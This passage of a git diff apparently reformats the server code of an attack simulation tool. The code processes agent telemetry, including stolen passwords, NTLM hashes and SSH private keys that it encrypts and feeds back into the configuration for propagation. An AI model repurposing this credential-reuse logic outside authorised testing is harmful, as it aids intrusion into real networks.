logger.exception("Failed to export report, error: " + e) diff --git a/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py b/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py index 30e406e9f..dec13e6d6 100644 --- a/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py +++ b/monkey/monkey_island/cc/services/reporting/report_generation_synchronisation.py @@ -28,6 +28,7 @@ def safe_generate_reports(): def safe_generate_regular_report(): # Local import to avoid circular imports from monkey_island.cc.services.reporting.report import ReportService + try: __regular_report_generating_lock.acquire() report = ReportService.generate_report() @@ -39,6 +40,7 @@ def safe_generate_regular_report(): def safe_generate_attack_report(): # Local import to avoid circular imports from monkey_island.cc.services.attack.attack_report import AttackReportService + try: __attack_report_generating_lock.acquire() attack_report = AttackReportService.generate_new_report() diff --git a/monkey/monkey_island/cc/services/reporting/test_report.py b/monkey/monkey_island/cc/services/reporting/test_report.py index 5f95eae47..cf446c757 100644 --- a/monkey/monkey_island/cc/services/reporting/test_report.py +++ 
b/monkey/monkey_island/cc/services/reporting/test_report.py @@ -4,48 +4,59 @@ from copy import deepcopy from monkey_island.cc.services.reporting.report import ReportService NODE_DICT = { - 'id': '602f62118e30cf35830ff8e4', - 'label': 'WinDev2010Eval.mshome.net', - 'group': 'monkey_windows', - 'os': 'windows', - 'dead': True, - 'exploits': [{'result': True, - 'exploiter': 'DrupalExploiter', - 'info': {'display_name': 'Drupal Server', - 'started': datetime.datetime(2021, 2, 19, 9, 0, 14, 950000), - 'finished': datetime.datetime(2021, 2, 19, 9, 0, 14, 950000), - 'vulnerable_urls': [], - 'vulnerable_ports': [], - 'executed_cmds': []}, - 'attempts': [], - 'timestamp': datetime.datetime(2021, 2, 19, 9, 0, 14, 984000), - 'origin': 'MonkeyIsland : 192.168.56.1'}, - - {'result': True, - 'exploiter': 'ElasticGroovyExploiter', - 'info': {'display_name': 'Elastic search', - 'started': datetime.datetime(2021, 2, 19, 9, 0, 15, 16000), - 'finished': datetime.datetime(2021, 2, 19, 9, 0, 15, 17000), - 'vulnerable_urls': [], 'vulnerable_ports': [], 'executed_cmds': []}, - 'attempts': [], - 'timestamp': datetime.datetime(2021, 2, 19, 9, 0, 15, 60000), - 'origin': 'MonkeyIsland : 192.168.56.1'}] + "id": "602f62118e30cf35830ff8e4", + "label": "WinDev2010Eval.mshome.net", + "group": "monkey_windows", + "os": "windows", + "dead": True, + "exploits": [ + { + "result": True, + "exploiter": "DrupalExploiter", + "info": { + "display_name": "Drupal Server", + "started": datetime.datetime(2021, 2, 19, 9, 0, 14, 950000), + "finished": datetime.datetime(2021, 2, 19, 9, 0, 14, 950000), + "vulnerable_urls": [], + "vulnerable_ports": [], + "executed_cmds": [], + }, + "attempts": [], + "timestamp": datetime.datetime(2021, 2, 19, 9, 0, 14, 984000), + "origin": "MonkeyIsland : 192.168.56.1", + }, + { + "result": True, + "exploiter": "ElasticGroovyExploiter", + "info": { + "display_name": "Elastic search", + "started": datetime.datetime(2021, 2, 19, 9, 0, 15, 16000), + "finished": datetime.datetime(2021, 2, 19, 9, 0, 15, 17000), + "vulnerable_urls": [], + "vulnerable_ports": [], + "executed_cmds": [], + }, + "attempts": [], + "timestamp": datetime.datetime(2021, 2, 19, 9, 0, 15, 60000), + "origin": "MonkeyIsland : 192.168.56.1", + }, + ], } NODE_DICT_DUPLICATE_EXPLOITS = deepcopy(NODE_DICT) -NODE_DICT_DUPLICATE_EXPLOITS['exploits'][1] = NODE_DICT_DUPLICATE_EXPLOITS['exploits'][0] +NODE_DICT_DUPLICATE_EXPLOITS["exploits"][1] = NODE_DICT_DUPLICATE_EXPLOITS["exploits"][0] NODE_DICT_FAILED_EXPLOITS = deepcopy(NODE_DICT) -NODE_DICT_FAILED_EXPLOITS['exploits'][0]['result'] = False -NODE_DICT_FAILED_EXPLOITS['exploits'][1]['result'] = False +NODE_DICT_FAILED_EXPLOITS["exploits"][0]["result"] = False +NODE_DICT_FAILED_EXPLOITS["exploits"][1]["result"] = False def test_get_exploits_used_on_node(): exploits = ReportService.get_exploits_used_on_node(NODE_DICT) - assert sorted(exploits) == sorted(['Elastic Groovy Exploiter', 'Drupal Server Exploiter']) + assert sorted(exploits) == sorted(["Elastic Groovy Exploiter", "Drupal Server Exploiter"]) exploits = ReportService.get_exploits_used_on_node(NODE_DICT_DUPLICATE_EXPLOITS) - assert exploits == ['Drupal Server Exploiter'] + assert exploits == ["Drupal Server Exploiter"] exploits = ReportService.get_exploits_used_on_node(NODE_DICT_FAILED_EXPLOITS) assert exploits == [] diff --git a/monkey/monkey_island/cc/services/representations.py b/monkey/monkey_island/cc/services/representations.py index cd804db50..0193fae0d 100644 --- a/monkey/monkey_island/cc/services/representations.py +++ 
b/monkey/monkey_island/cc/services/representations.py @@ -6,9 +6,9 @@ from flask import make_response def normalize_obj(obj): - if ('_id' in obj) and ('id' not in obj): - obj['id'] = obj['_id'] - del obj['_id'] + if ("_id" in obj) and ("id" not in obj): + obj["id"] = obj["_id"] + del obj["_id"] for key, value in list(obj.items()): if isinstance(value, bson.objectid.ObjectId): diff --git a/monkey/monkey_island/cc/services/representations_test.py b/monkey/monkey_island/cc/services/representations_test.py index 079cb995f..8aadc0bed 100644 --- a/monkey/monkey_island/cc/services/representations_test.py +++ b/monkey/monkey_island/cc/services/representations_test.py @@ -12,22 +12,15 @@ class TestJsonRepresentations(TestCase): self.assertEqual({}, normalize_obj({})) # no special content - self.assertEqual( - {"a": "a"}, - normalize_obj({"a": "a"}) - ) + self.assertEqual({"a": "a"}, normalize_obj({"a": "a"})) # _id field -> id field - self.assertEqual( - {"id": 12345}, - normalize_obj({"_id": 12345}) - ) + self.assertEqual({"id": 12345}, normalize_obj({"_id": 12345})) # obj id field -> str obj_id_str = "123456789012345678901234" self.assertEqual( - {"id": obj_id_str}, - normalize_obj({"_id": bson.objectid.ObjectId(obj_id_str)}) + {"id": obj_id_str}, normalize_obj({"_id": bson.objectid.ObjectId(obj_id_str)}) ) # datetime -> str @@ -37,18 +30,17 @@ class TestJsonRepresentations(TestCase): self.assertEqual(expected, result) # dicts and lists - self.assertEqual({ - "a": [ - {"ba": obj_id_str, - "bb": obj_id_str} - ], - "b": {"id": obj_id_str} - }, - normalize_obj({ - "a": [ - {"ba": bson.objectid.ObjectId(obj_id_str), - "bb": bson.objectid.ObjectId(obj_id_str)} - ], - "b": {"_id": bson.objectid.ObjectId(obj_id_str)} - }) + self.assertEqual( + {"a": [{"ba": obj_id_str, "bb": obj_id_str}], "b": {"id": obj_id_str}}, + normalize_obj( + { + "a": [ + { + "ba": bson.objectid.ObjectId(obj_id_str), + "bb": bson.objectid.ObjectId(obj_id_str), + } + ], + "b": {"_id": bson.objectid.ObjectId(obj_id_str)}, + } + ), ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/exploit.py b/monkey/monkey_island/cc/services/telemetry/processing/exploit.py index 9b06b028d..acd8f261b 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/exploit.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/exploit.py @@ -7,8 +7,12 @@ from monkey_island.cc.models import Monkey from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.edge.displayed_edge import EdgeService from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.telemetry.processing.utils import get_edge_by_scan_or_exploit_telemetry -from monkey_island.cc.services.telemetry.zero_trust_checks.machine_exploited import check_machine_exploited +from monkey_island.cc.services.telemetry.processing.utils import ( + get_edge_by_scan_or_exploit_telemetry, +) +from monkey_island.cc.services.telemetry.zero_trust_checks.machine_exploited import ( + check_machine_exploited, +) def process_exploit_telemetry(telemetry_json): @@ -19,51 +23,56 @@ def process_exploit_telemetry(telemetry_json): add_exploit_extracted_creds_to_config(telemetry_json) check_machine_exploited( - current_monkey=Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']), - exploit_successful=telemetry_json['data']['result'], - exploiter=telemetry_json['data']['exploiter'], - target_ip=telemetry_json['data']['machine']['ip_addr'], - timestamp=telemetry_json['timestamp']) + 
current_monkey=Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]), + exploit_successful=telemetry_json["data"]["result"], + exploiter=telemetry_json["data"]["exploiter"], + target_ip=telemetry_json["data"]["machine"]["ip_addr"], + timestamp=telemetry_json["timestamp"], + ) def add_exploit_extracted_creds_to_config(telemetry_json): - if 'credentials' in telemetry_json['data']['info']: - creds = telemetry_json['data']['info']['credentials'] + if "credentials" in telemetry_json["data"]["info"]: + creds = telemetry_json["data"]["info"]["credentials"] for user in creds: - ConfigService.creds_add_username(creds[user]['username']) - if 'password' in creds[user] and creds[user]['password']: - ConfigService.creds_add_password(creds[user]['password']) - if 'lm_hash' in creds[user] and creds[user]['lm_hash']: - ConfigService.creds_add_lm_hash(creds[user]['lm_hash']) - if 'ntlm_hash' in creds[user] and creds[user]['ntlm_hash']: - ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash']) + ConfigService.creds_add_username(creds[user]["username"]) + if "password" in creds[user] and creds[user]["password"]: + ConfigService.creds_add_password(creds[user]["password"]) + if "lm_hash" in creds[user] and creds[user]["lm_hash"]: + ConfigService.creds_add_lm_hash(creds[user]["lm_hash"]) + if "ntlm_hash" in creds[user] and creds[user]["ntlm_hash"]: + ConfigService.creds_add_ntlm_hash(creds[user]["ntlm_hash"]) def update_node_credentials_from_successful_attempts(edge: EdgeService, telemetry_json): - for attempt in telemetry_json['data']['attempts']: - if attempt['result']: - found_creds = {'user': attempt['user']} - for field in ['password', 'lm_hash', 'ntlm_hash', 'ssh_key']: + for attempt in telemetry_json["data"]["attempts"]: + if attempt["result"]: + found_creds = {"user": attempt["user"]} + for field in ["password", "lm_hash", "ntlm_hash", "ssh_key"]: if len(attempt[field]) != 0: found_creds[field] = attempt[field] NodeService.add_credentials_to_node(edge.dst_node_id, found_creds) def update_network_with_exploit(edge: EdgeService, telemetry_json): - telemetry_json['data']['info']['started'] = dateutil.parser.parse(telemetry_json['data']['info']['started']) - telemetry_json['data']['info']['finished'] = dateutil.parser.parse(telemetry_json['data']['info']['finished']) - new_exploit = copy.deepcopy(telemetry_json['data']) - new_exploit.pop('machine') - new_exploit['timestamp'] = telemetry_json['timestamp'] + telemetry_json["data"]["info"]["started"] = dateutil.parser.parse( + telemetry_json["data"]["info"]["started"] + ) + telemetry_json["data"]["info"]["finished"] = dateutil.parser.parse( + telemetry_json["data"]["info"]["finished"] + ) + new_exploit = copy.deepcopy(telemetry_json["data"]) + new_exploit.pop("machine") + new_exploit["timestamp"] = telemetry_json["timestamp"] edge.update_based_on_exploit(new_exploit) - if new_exploit['result']: + if new_exploit["result"]: NodeService.set_node_exploited(edge.dst_node_id) def encrypt_exploit_creds(telemetry_json): - attempts = telemetry_json['data']['attempts'] + attempts = telemetry_json["data"]["attempts"] for i in range(len(attempts)): - for field in ['password', 'lm_hash', 'ntlm_hash']: + for field in ["password", "lm_hash", "ntlm_hash"]: credential = attempts[i][field] if len(credential) > 0: attempts[i][field] = get_encryptor().enc(credential) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py index b06b638c8..be7b6e7ea 100644 --- 
a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py @@ -3,15 +3,17 @@ import copy from common.common_consts.post_breach_consts import POST_BREACH_COMMUNICATE_AS_NEW_USER from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey -from monkey_island.cc.services.telemetry.zero_trust_checks.communicate_as_new_user import check_new_user_communication +from monkey_island.cc.services.telemetry.zero_trust_checks.communicate_as_new_user import ( + check_new_user_communication, +) EXECUTION_WITHOUT_OUTPUT = "(PBA execution produced no output)" def process_communicate_as_new_user_telemetry(telemetry_json): - current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) - message = telemetry_json['data']['result'][0] - success = telemetry_json['data']['result'][1] + current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]) + message = telemetry_json["data"]["result"][0] + success = telemetry_json["data"]["result"][1] check_new_user_communication(current_monkey, success, message) @@ -23,35 +25,35 @@ POST_BREACH_TELEMETRY_PROCESSING_FUNCS = { def process_post_breach_telemetry(telemetry_json): def convert_telem_data_to_list(data): modified_data = [data] - if type(data['result'][0]) is list: # multiple results in one pba + if type(data["result"][0]) is list: # multiple results in one pba modified_data = separate_results_to_single_pba_telems(data) return modified_data def separate_results_to_single_pba_telems(data): modified_data = [] - for result in data['result']: + for result in data["result"]: temp = copy.deepcopy(data) - temp['result'] = result + temp["result"] = result modified_data.append(temp) return modified_data def add_message_for_blank_outputs(data): - if not data['result'][0]: - data['result'][0] = EXECUTION_WITHOUT_OUTPUT + if not data["result"][0]: + data["result"][0] = EXECUTION_WITHOUT_OUTPUT return data post_breach_action_name = telemetry_json["data"]["name"] if post_breach_action_name in POST_BREACH_TELEMETRY_PROCESSING_FUNCS: POST_BREACH_TELEMETRY_PROCESSING_FUNCS[post_breach_action_name](telemetry_json) - telemetry_json['data'] = convert_telem_data_to_list(telemetry_json['data']) + telemetry_json["data"] = convert_telem_data_to_list(telemetry_json["data"]) - for pba_data in telemetry_json['data']: + for pba_data in telemetry_json["data"]: pba_data = add_message_for_blank_outputs(pba_data) update_data(telemetry_json, pba_data) def update_data(telemetry_json, data): mongo.db.monkey.update( - {'guid': telemetry_json['monkey_guid']}, - {'$push': {'pba_results': data}}) + {"guid": telemetry_json["monkey_guid"]}, {"$push": {"pba_results": data}} + ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/processing.py b/monkey/monkey_island/cc/services/telemetry/processing/processing.py index 151fd672f..667928d3c 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/processing.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/processing.py @@ -11,27 +11,28 @@ from monkey_island.cc.services.telemetry.processing.tunnel import process_tunnel logger = logging.getLogger(__name__) -TELEMETRY_CATEGORY_TO_PROCESSING_FUNC = \ - { - TelemCategoryEnum.TUNNEL: process_tunnel_telemetry, - TelemCategoryEnum.STATE: process_state_telemetry, - TelemCategoryEnum.EXPLOIT: process_exploit_telemetry, - TelemCategoryEnum.SCAN: process_scan_telemetry, - TelemCategoryEnum.SYSTEM_INFO: process_system_info_telemetry, - 
TelemCategoryEnum.POST_BREACH: process_post_breach_telemetry, - TelemCategoryEnum.SCOUTSUITE: process_scoutsuite_telemetry, - # `lambda *args, **kwargs: None` is a no-op. - TelemCategoryEnum.TRACE: lambda *args, **kwargs: None, - TelemCategoryEnum.ATTACK: lambda *args, **kwargs: None, - } +TELEMETRY_CATEGORY_TO_PROCESSING_FUNC = { + TelemCategoryEnum.TUNNEL: process_tunnel_telemetry, + TelemCategoryEnum.STATE: process_state_telemetry, + TelemCategoryEnum.EXPLOIT: process_exploit_telemetry, + TelemCategoryEnum.SCAN: process_scan_telemetry, + TelemCategoryEnum.SYSTEM_INFO: process_system_info_telemetry, + TelemCategoryEnum.POST_BREACH: process_post_breach_telemetry, + TelemCategoryEnum.SCOUTSUITE: process_scoutsuite_telemetry, + # `lambda *args, **kwargs: None` is a no-op. + TelemCategoryEnum.TRACE: lambda *args, **kwargs: None, + TelemCategoryEnum.ATTACK: lambda *args, **kwargs: None, +} def process_telemetry(telemetry_json): try: - telem_category = telemetry_json.get('telem_category') + telem_category = telemetry_json.get("telem_category") if telem_category in TELEMETRY_CATEGORY_TO_PROCESSING_FUNC: TELEMETRY_CATEGORY_TO_PROCESSING_FUNC[telem_category](telemetry_json) else: - logger.info('Got unknown type of telemetry: %s' % telem_category) + logger.info("Got unknown type of telemetry: %s" % telem_category) except Exception as ex: - logger.error("Exception caught while processing telemetry. Info: {}".format(ex), exc_info=True) + logger.error( + "Exception caught while processing telemetry. Info: {}".format(ex), exc_info=True + ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/scan.py b/monkey/monkey_island/cc/services/telemetry/processing/scan.py index d0b204d16..764cd3044 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/scan.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/scan.py @@ -1,17 +1,23 @@ from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.telemetry.processing.utils import get_edge_by_scan_or_exploit_telemetry -from monkey_island.cc.services.telemetry.zero_trust_checks.data_endpoints import check_open_data_endpoints -from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import check_segmentation_violation +from monkey_island.cc.services.telemetry.processing.utils import ( + get_edge_by_scan_or_exploit_telemetry, +) +from monkey_island.cc.services.telemetry.zero_trust_checks.data_endpoints import ( + check_open_data_endpoints, +) +from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import ( + check_segmentation_violation, +) def process_scan_telemetry(telemetry_json): update_edges_and_nodes_based_on_scan_telemetry(telemetry_json) check_open_data_endpoints(telemetry_json) - current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) - target_ip = telemetry_json['data']['machine']['ip_addr'] + current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]) + target_ip = telemetry_json["data"]["machine"]["ip_addr"] check_segmentation_violation(current_monkey, target_ip) @@ -21,14 +27,14 @@ def update_edges_and_nodes_based_on_scan_telemetry(telemetry_json): node = mongo.db.node.find_one({"_id": edge.dst_node_id}) if node is not None: - scan_os = telemetry_json['data']['machine']["os"] + scan_os = telemetry_json["data"]["machine"]["os"] if "type" in scan_os: - mongo.db.node.update({"_id": node["_id"]}, - {"$set": {"os.type": 
scan_os["type"]}}, - upsert=False) + mongo.db.node.update( + {"_id": node["_id"]}, {"$set": {"os.type": scan_os["type"]}}, upsert=False + ) if "version" in scan_os: - mongo.db.node.update({"_id": node["_id"]}, - {"$set": {"os.version": scan_os["version"]}}, - upsert=False) + mongo.db.node.update( + {"_id": node["_id"]}, {"$set": {"os.version": scan_os["version"]}}, upsert=False + ) label = NodeService.get_label_for_endpoint(node["_id"]) edge.update_label(node["_id"], label) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py b/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py index 9160861ea..5f2677bcb 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py @@ -2,18 +2,24 @@ import json from monkey_island.cc.database import mongo from monkey_island.cc.models.zero_trust.scoutsuite_data_json import ScoutSuiteRawDataJson -from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_findings_list import SCOUTSUITE_FINDINGS +from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_findings_list import ( + SCOUTSUITE_FINDINGS, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICES from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_parser import RuleParser -from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import ScoutSuiteRuleService -from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_zt_finding_service import ScoutSuiteZTFindingService +from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service import ( + ScoutSuiteRuleService, +) +from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_zt_finding_service import ( + ScoutSuiteZTFindingService, +) def process_scoutsuite_telemetry(telemetry_json): # Encode data to json, because mongo can't save it as document (invalid document keys) - telemetry_json['data'] = json.dumps(telemetry_json['data']) - ScoutSuiteRawDataJson.add_scoutsuite_data(telemetry_json['data']) - scoutsuite_data = json.loads(telemetry_json['data'])['data'] + telemetry_json["data"] = json.dumps(telemetry_json["data"]) + ScoutSuiteRawDataJson.add_scoutsuite_data(telemetry_json["data"]) + scoutsuite_data = json.loads(telemetry_json["data"])["data"] create_scoutsuite_findings(scoutsuite_data[SERVICES]) update_data(telemetry_json) @@ -28,5 +34,5 @@ def create_scoutsuite_findings(cloud_services: dict): def update_data(telemetry_json): mongo.db.scoutsuite.insert_one( - {'guid': telemetry_json['monkey_guid']}, - {'results': telemetry_json['data']}) + {"guid": telemetry_json["monkey_guid"]}, {"results": telemetry_json["data"]} + ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/state.py b/monkey/monkey_island/cc/services/telemetry/processing/state.py index 4f596fb88..8749cc730 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/state.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/state.py @@ -2,23 +2,26 @@ import logging from monkey_island.cc.models import Monkey from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import \ - check_passed_findings_for_unreached_segments +from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import ( + check_passed_findings_for_unreached_segments, +) logger = logging.getLogger(__name__) def 
process_state_telemetry(telemetry_json): - monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']) - NodeService.add_communication_info(monkey, telemetry_json['command_control_channel']) - if telemetry_json['data']['done']: + monkey = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"]) + NodeService.add_communication_info(monkey, telemetry_json["command_control_channel"]) + if telemetry_json["data"]["done"]: NodeService.set_monkey_dead(monkey, True) else: NodeService.set_monkey_dead(monkey, False) - if telemetry_json['data']['done']: - current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) + if telemetry_json["data"]["done"]: + current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]) check_passed_findings_for_unreached_segments(current_monkey) - if telemetry_json['data']['version']: - logger.info(f"monkey {telemetry_json['monkey_guid']} has version {telemetry_json['data']['version']}") + if telemetry_json["data"]["version"]: + logger.info( + f"monkey {telemetry_json['monkey_guid']} has version {telemetry_json['data']['version']}" + ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info.py index 250080697..3313b763d 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/system_info.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info.py @@ -3,8 +3,9 @@ import logging from monkey_island.cc.server_utils.encryptor import get_encryptor from monkey_island.cc.services.config import ConfigService from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import \ - SystemInfoTelemetryDispatcher +from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import ( + SystemInfoTelemetryDispatcher, +) from monkey_island.cc.services.wmi_handler import WMIHandler logger = logging.getLogger(__name__) @@ -16,7 +17,7 @@ def process_system_info_telemetry(telemetry_json): process_ssh_info, process_credential_info, process_wmi_info, - dispatcher.dispatch_collector_results_to_relevant_processors + dispatcher.dispatch_collector_results_to_relevant_processors, ] # Calling safe_process_telemetry so if one of the stages fail, we log and move on instead of failing the rest of @@ -31,70 +32,74 @@ def safe_process_telemetry(processing_function, telemetry_json): processing_function(telemetry_json) except Exception as err: logger.error( - "Error {} while in {} stage of processing telemetry.".format(str(err), processing_function.__name__), - exc_info=True) + "Error {} while in {} stage of processing telemetry.".format( + str(err), processing_function.__name__ + ), + exc_info=True, + ) def process_ssh_info(telemetry_json): - if 'ssh_info' in telemetry_json['data']: - ssh_info = telemetry_json['data']['ssh_info'] + if "ssh_info" in telemetry_json["data"]: + ssh_info = telemetry_json["data"]["ssh_info"] encrypt_system_info_ssh_keys(ssh_info) - if telemetry_json['data']['network_info']['networks']: + if telemetry_json["data"]["network_info"]["networks"]: # We use user_name@machine_ip as the name of the ssh key stolen, thats why we need ip from telemetry - add_ip_to_ssh_keys(telemetry_json['data']['network_info']['networks'][0], ssh_info) + add_ip_to_ssh_keys(telemetry_json["data"]["network_info"]["networks"][0], ssh_info) add_system_info_ssh_keys_to_config(ssh_info) def 
add_system_info_ssh_keys_to_config(ssh_info): for user in ssh_info: - ConfigService.creds_add_username(user['name']) + ConfigService.creds_add_username(user["name"]) # Public key is useless without private key - if user['public_key'] and user['private_key']: - ConfigService.ssh_add_keys(user['public_key'], user['private_key'], - user['name'], user['ip']) + if user["public_key"] and user["private_key"]: + ConfigService.ssh_add_keys( + user["public_key"], user["private_key"], user["name"], user["ip"] + ) def add_ip_to_ssh_keys(ip, ssh_info): for key in ssh_info: - key['ip'] = ip['addr'] + key["ip"] = ip["addr"] def encrypt_system_info_ssh_keys(ssh_info): for idx, user in enumerate(ssh_info): - for field in ['public_key', 'private_key', 'known_hosts']: + for field in ["public_key", "private_key", "known_hosts"]: if ssh_info[idx][field]: ssh_info[idx][field] = get_encryptor().enc(ssh_info[idx][field]) def process_credential_info(telemetry_json): - if 'credentials' in telemetry_json['data']: - creds = telemetry_json['data']['credentials'] + if "credentials" in telemetry_json["data"]: + creds = telemetry_json["data"]["credentials"] add_system_info_creds_to_config(creds) replace_user_dot_with_comma(creds) def replace_user_dot_with_comma(creds): for user in creds: - if -1 != user.find('.'): - new_user = user.replace('.', ',') + if -1 != user.find("."): + new_user = user.replace(".", ",") creds[new_user] = creds.pop(user) def add_system_info_creds_to_config(creds): for user in creds: - ConfigService.creds_add_username(creds[user]['username']) - if 'password' in creds[user] and creds[user]['password']: - ConfigService.creds_add_password(creds[user]['password']) - if 'lm_hash' in creds[user] and creds[user]['lm_hash']: - ConfigService.creds_add_lm_hash(creds[user]['lm_hash']) - if 'ntlm_hash' in creds[user] and creds[user]['ntlm_hash']: - ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash']) + ConfigService.creds_add_username(creds[user]["username"]) + if "password" in creds[user] and creds[user]["password"]: + ConfigService.creds_add_password(creds[user]["password"]) + if "lm_hash" in creds[user] and creds[user]["lm_hash"]: + ConfigService.creds_add_lm_hash(creds[user]["lm_hash"]) + if "ntlm_hash" in creds[user] and creds[user]["ntlm_hash"]: + ConfigService.creds_add_ntlm_hash(creds[user]["ntlm_hash"]) def process_wmi_info(telemetry_json): users_secrets = {} - if 'wmi' in telemetry_json['data']: - monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id') - wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets) + if "wmi" in telemetry_json["data"]: + monkey_id = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"]).get("_id") + wmi_handler = WMIHandler(monkey_id, telemetry_json["data"]["wmi"], users_secrets) wmi_handler.process_and_handle_wmi_info() diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py index 2b4d8085e..0fae438d4 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py @@ -12,4 +12,6 @@ def process_aws_telemetry(collector_results, monkey_guid): instance_id = collector_results["instance_id"] relevant_monkey.aws_instance_id = instance_id relevant_monkey.save() - logger.debug("Updated Monkey {} with aws instance id {}".format(str(relevant_monkey), instance_id)) + 
logger.debug( + "Updated Monkey {} with aws instance id {}".format(str(relevant_monkey), instance_id) + ) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py index 6d9ec8492..894bdce75 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py @@ -1,13 +1,24 @@ import logging import typing -from common.common_consts.system_info_collectors_names import (AWS_COLLECTOR, ENVIRONMENT_COLLECTOR, HOSTNAME_COLLECTOR, - PROCESS_LIST_COLLECTOR) -from monkey_island.cc.services.telemetry.processing.system_info_collectors.aws import process_aws_telemetry -from monkey_island.cc.services.telemetry.processing.system_info_collectors.environment import \ - process_environment_telemetry -from monkey_island.cc.services.telemetry.processing.system_info_collectors.hostname import process_hostname_telemetry -from monkey_island.cc.services.telemetry.zero_trust_checks.antivirus_existence import check_antivirus_existence +from common.common_consts.system_info_collectors_names import ( + AWS_COLLECTOR, + ENVIRONMENT_COLLECTOR, + HOSTNAME_COLLECTOR, + PROCESS_LIST_COLLECTOR, +) +from monkey_island.cc.services.telemetry.processing.system_info_collectors.aws import ( + process_aws_telemetry, +) +from monkey_island.cc.services.telemetry.processing.system_info_collectors.environment import ( + process_environment_telemetry, +) +from monkey_island.cc.services.telemetry.processing.system_info_collectors.hostname import ( + process_hostname_telemetry, +) +from monkey_island.cc.services.telemetry.zero_trust_checks.antivirus_existence import ( + check_antivirus_existence, +) logger = logging.getLogger(__name__) @@ -15,12 +26,15 @@ SYSTEM_INFO_COLLECTOR_TO_TELEMETRY_PROCESSORS = { AWS_COLLECTOR: [process_aws_telemetry], ENVIRONMENT_COLLECTOR: [process_environment_telemetry], HOSTNAME_COLLECTOR: [process_hostname_telemetry], - PROCESS_LIST_COLLECTOR: [check_antivirus_existence] + PROCESS_LIST_COLLECTOR: [check_antivirus_existence], } class SystemInfoTelemetryDispatcher(object): - def __init__(self, collector_to_parsing_functions: typing.Mapping[str, typing.List[typing.Callable]] = None): + def __init__( + self, + collector_to_parsing_functions: typing.Mapping[str, typing.List[typing.Callable]] = None, + ): """ :param collector_to_parsing_functions: Map between collector names and a list of functions that process the output of that collector. 
